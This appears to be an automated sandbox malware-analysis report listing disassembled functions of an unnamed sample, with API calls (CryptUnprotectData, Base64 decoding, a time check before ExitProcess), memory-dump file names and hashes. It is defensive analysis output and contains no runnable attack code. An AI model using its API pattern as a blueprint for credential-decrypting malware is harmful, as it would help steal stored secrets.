Opcode Fuzzy Hash: 519eb5030ab27f55a994fc7fa61b293081fe2fb87bf84cfe011a63bb1fb55f64
Instruction Fuzzy Hash: 17B217F36082049FE304AE2DEC85A7AFBE9EFD4720F16853DE6C4C3744EA7558058696

Function 00769AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nv,00000000,00000000), ref: 00769AEF
LocalAlloc.KERNEL32(00000040,?,?,?,00764EEE,00000000,?), ref: 00769B01
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nv,00000000,00000000), ref: 00769B2A
LocalFree.KERNEL32(?,?,?,?,00764EEE,00000000,?), ref: 00769B3F

Strings

Nv, xrefs: 00769AD4, 00769AE1, 00769AF9, 00769B18, 00769AE4, 00769B1B

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID: Nv
API String ID: 4291131564-866984478
Opcode ID: df9091856ff9c3393d4355b2a08044f532530de435369416f614c305c5a86e85
Instruction ID: 56993a346d2af7aeb1a36a4459f66a1816ec60fb3223e6bb74579736213e0e67
Opcode Fuzzy Hash: df9091856ff9c3393d4355b2a08044f532530de435369416f614c305c5a86e85
Instruction Fuzzy Hash: B511A4B4240208AFEB10CF64DC95FAA77B9FB89B10F208058FE199B394C775A901DB90

Function 00B35D31 Relevance: 7.9, Strings: 5, Instructions: 1646COMMON

Download Yara Rule

Strings

! O|, xrefs: 00B36BDA
2u{, xrefs: 00B36B9A
$9(W, xrefs: 00B361AA
[7u, xrefs: 00B36ED2
B!/h, xrefs: 00B370C1

Memory Dump Source

Source File: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID:
String ID: ! O|$$9(W$2u{$B!/h$[7u
API String ID: 0-4247877922
Opcode ID: 46e928703e9d6f3d0bc1afd43af50d3157f5104ee25932673c9ba66b384b10ac
Instruction ID: 4761ed5e3ba51b352989a5a64735c190475b5bc6ec480ebd9debaeb53b65005f
Opcode Fuzzy Hash: 46e928703e9d6f3d0bc1afd43af50d3157f5104ee25932673c9ba66b384b10ac
Instruction Fuzzy Hash: 5EB229F3A08204AFE3046E2DEC8577AFBD9EBD8720F1A453DEAC4C3744E97558058696

Function 00B2527B Relevance: 7.8, Strings: 5, Instructions: 1598COMMON

Download Yara Rule

Strings

>kOo, xrefs: 00B2598D
f=o, xrefs: 00B25BFA
?_w, xrefs: 00B26520
PE?, xrefs: 00B25314
*8t, xrefs: 00B25C5D

Memory Dump Source

Source File: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID:
String ID: *8t$>kOo$?_w$PE?$f=o
API String ID: 0-1351802705
Opcode ID: edc9b4bb631e2ac5daa70b2dc38450aed7547b4ccf97472d1984517c5e796fd9
Instruction ID: 803622a12625bd62efd8ecafb1638d32f5d78573eebad2bb49f7b1f299ddf08a
Opcode Fuzzy Hash: edc9b4bb631e2ac5daa70b2dc38450aed7547b4ccf97472d1984517c5e796fd9
Instruction Fuzzy Hash: AEB239F390C2009FE3046E29EC8577AFBE9EF94720F1A493DEAC4C7744E63598058696

Function 00776920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 0077696C
sscanf.NTDLL ref: 00776999
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 007769B2
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 007769C0
ExitProcess.KERNEL32 ref: 007769DA

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: Time$System$File$ExitProcesssscanf
String ID:
API String ID: 2533653975-0
Opcode ID: ec06bb0073e9d3d0b20dd7f63ea49e39b12019b43f85023288dcc98bdcadc7d6
Instruction ID: fd7f800360d4f9dcffd90f7ab87bc88fcb596ed6f3b741c0b0f781d92fa2569b
Opcode Fuzzy Hash: ec06bb0073e9d3d0b20dd7f63ea49e39b12019b43f85023288dcc98bdcadc7d6
Instruction Fuzzy Hash: E221FF75D14208ABCF44EFE8D9459EEB7B5FF48300F04852EE51AE3254EB345604CBA5

Function 00767240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000400), ref: 0076724D
RtlAllocateHeap.NTDLL(00000000), ref: 00767254
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00767281
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 007672A4
LocalFree.KERNEL32(?), ref: 007672AE

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
String ID:
API String ID: 2609814428-0
Opcode ID: 25b401824aa020996fff6edb28feda7e32ec0e41025b81eea5e70e85f01d042c
Instruction ID: ee165a1313c42b2cedef467681ea8cee756575714308ffc86f1978979c505608
Opcode Fuzzy Hash: 25b401824aa020996fff6edb28feda7e32ec0e41025b81eea5e70e85f01d042c
Instruction Fuzzy Hash: 420100B5A54208BBDB14DFD8CD45F9E7778AB44B04F104154FB05AA2C0D774AA00DBA5

Function 00B39337 Relevance: 6.6, Strings: 4, Instructions: 1629COMMON

Download Yara Rule

Strings

gI{u, xrefs: 00B396F6
3Y-, xrefs: 00B39425
}S?O, xrefs: 00B398BF
BMs}, xrefs: 00B3A1B6

Memory Dump Source

Source File: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 3Y-$BMs}$gI{u$}S?O
API String ID: 0-1676301014
Opcode ID: 8414731d40e532059ff6e298e1668b8ce92b805e9be2eaf7b2e40106c4ab675f
Instruction ID: 122106c173cb44d80e5ea47366b92a241953416aa23d5d0af1568ca24e94d325
Opcode Fuzzy Hash: 8414731d40e532059ff6e298e1668b8ce92b805e9be2eaf7b2e40106c4ab675f
Instruction Fuzzy Hash: 68B217F3A082049FE304AE2DEC8567AF7E9EF94720F1A453DE6C5D3744EA3598048697

Function 6CC0545C Relevance: 6.6, APIs: 5, Instructions: 305COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6CC08A4B

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction ID: 00d382e952be12e19270d1f0faa7e1510a103b0fe7d912c3cbff3c65e8f34f2c
Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction Fuzzy Hash: 0EB1D672F0121A8FDB14CF68CC91BA9B7B2FF85314F1802A9C549DBB81E7319985CB91

Function 6CC0542B Relevance: 6.5, APIs: 5, Instructions: 287COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6CC088F0
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6CC0925C

Memory Dump Source

Source File: 00000000.00000002.1666793206.000000006CB91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CB90000, based on PE: true

Associated: 00000000.00000002.1666772403.000000006CB90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666853915.000000006CC0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666883554.000000006CC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1666905058.000000006CC22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cb90000_file.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction ID: a3eebbefa8a0c5adddfa4fda929834c5956c3e3b587b77ad70553d7f8f36326f
Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction Fuzzy Hash: 3DB1B572F0121ACBCB14CF58C891BEDB7B2EF85314F154269C549DBB85E731A989CB90

Function 00B312CE Relevance: 6.2, Strings: 4, Instructions: 1210COMMON

Download Yara Rule

Strings

`c;[, xrefs: 00B319DA
\3{*, xrefs: 00B32001
4;?, xrefs: 00B3192B
}/Y, xrefs: 00B31C49

Memory Dump Source

Source File: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID:
String ID: \3{*$`c;[$}/Y$4;?
API String ID: 0-490853492
Opcode ID: ed91bb1aa5eeabb4e62f211220bbd11313a22fc930bd0761c8e609390522d287
Instruction ID: f9ea4b9f40e7c4fc32b8574c30a03c361d68b40e396baeec3c4f3e2f9029fae8
Opcode Fuzzy Hash: ed91bb1aa5eeabb4e62f211220bbd11313a22fc930bd0761c8e609390522d287
Instruction Fuzzy Hash: D382E7F3A0C2009FD3046E2DEC8567ABBE5EF94720F1A892DE6C4C3744EA3598458797

Function 00778EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(00000000,00765184,40000001,00000000,00000000,?,00765184), ref: 00778EC0

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
